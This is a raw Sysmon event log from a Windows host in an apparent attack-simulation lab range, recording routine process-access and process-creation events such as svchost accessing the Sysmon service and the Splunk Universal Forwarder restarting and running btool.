10341000x80000000000000006932Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:50.263{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006931Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:50.263{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006930Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:50.263{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006929Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:50.263{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006928Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:50.263{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006927Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:50.263{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006926Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:50.263{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006925Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:50.263{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006924Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:50.263{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006923Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:50.263{10ACEC4A-853E-5FCF-0500-000000009101}644660C:\Windows\system32\csrss.exe{10ACEC4A-85E6-5FCF-1001-000000009101}4336C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006922Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:50.263{10ACEC4A-85E6-5FCF-0F01-000000009101}25202308C:\Windows\system32\cmd.exe{10ACEC4A-85E6-5FCF-1001-000000009101}4336C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000006921Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:50.271{10ACEC4A-85E6-5FCF-1001-000000009101}4336C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exebtool server list kvstore --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{10ACEC4A-85E6-5FCF-0F01-000000009101}2520C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c btool server list kvstore --no-log 10341000x80000000000000006920Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:50.263{10ACEC4A-8552-5FCF-4100-000000009101}28042768C:\Windows\system32\conhost.exe{10ACEC4A-85E6-5FCF-0F01-000000009101}2520C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006919Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:50.263{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006918Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:50.263{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006917Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:50.263{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006916Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:50.263{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006915Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:50.263{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006914Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:50.263{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006913Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:50.263{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006912Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:50.263{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006911Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:50.263{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006910Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:50.263{10ACEC4A-853E-5FCF-0500-000000009101}644792C:\Windows\system32\csrss.exe{10ACEC4A-85E6-5FCF-0F01-000000009101}2520C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006909Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:50.263{10ACEC4A-85E5-5FCF-0801-000000009101}42803180C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE{10ACEC4A-85E6-5FCF-0F01-000000009101}2520C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+43bc6|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+6665|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+14ab4|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+d8a0|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000006908Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:50.266{10ACEC4A-85E6-5FCF-0F01-000000009101}2520C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c btool server list kvstore --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{10ACEC4A-85E5-5FCF-0801-000000009101}4280C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE" restart --waitonpid=3080 10341000x80000000000000006907Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:50.232{10ACEC4A-85E5-5FCF-0E01-000000009101}44044432C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{10ACEC4A-8551-5FCF-3300-000000009101}3080C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007065Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:52.746{10ACEC4A-8552-5FCF-4100-000000009101}28042768C:\Windows\system32\conhost.exe{10ACEC4A-85E8-5FCF-1A01-000000009101}5060C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007064Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 